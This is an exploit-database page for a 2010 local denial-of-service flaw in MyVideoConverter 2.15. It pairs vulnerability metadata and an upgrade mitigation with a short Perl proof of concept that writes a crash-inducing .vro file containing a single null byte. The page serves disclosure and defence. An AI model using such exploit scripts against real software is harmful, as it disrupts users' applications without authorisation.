header-logo
Suggest Exploit
vendor:
MyVideoConverter
by:
anonymous
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MyVideoConverter
Affected Version From: 2.15
Affected Version To: 2.15
Patch Exists: YES
Related CWE: N/A
CPE: a:ivideogo:myvideoconverter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

MyVideoConverter Local DoS

A denial of service vulnerability exists in MyVideoConverter 2.15, which can be exploited by creating a specially crafted .vro file containing a null byte. When the file is added and the Start button is clicked, the application will crash.

Mitigation:

Upgrade to the latest version of MyVideoConverter.
Source

Exploit-DB raw data:

# Exploit Title: MyVideoConverter Local DoS
# Date: April 5, 2010
# Software Link: [http://www.ivideogo.com/]
# Version: 2.15
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#!/usr/bin/perl

my $file = "hmm.vro";
my $null = "\x00";

open (FILE, ">$file");
print FILE "$null";

print "Done. . . Add file -> click Start.\n"